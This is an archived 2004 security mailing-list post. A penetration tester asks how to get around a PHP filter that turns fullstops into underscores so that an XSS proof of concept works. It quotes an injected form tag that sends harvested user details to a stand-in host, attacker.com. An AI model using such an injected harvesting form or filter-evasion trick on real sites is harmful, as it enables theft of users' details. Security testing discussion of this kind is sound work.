WebApp Sec mailing list archives

Fullstop Substitution in XSS
From: "Calum Power" <enune () fribble net>
Date: Sat, 29 May 2004 14:49:29 +1000 (EST)

Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerability. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic

enune () fribble net
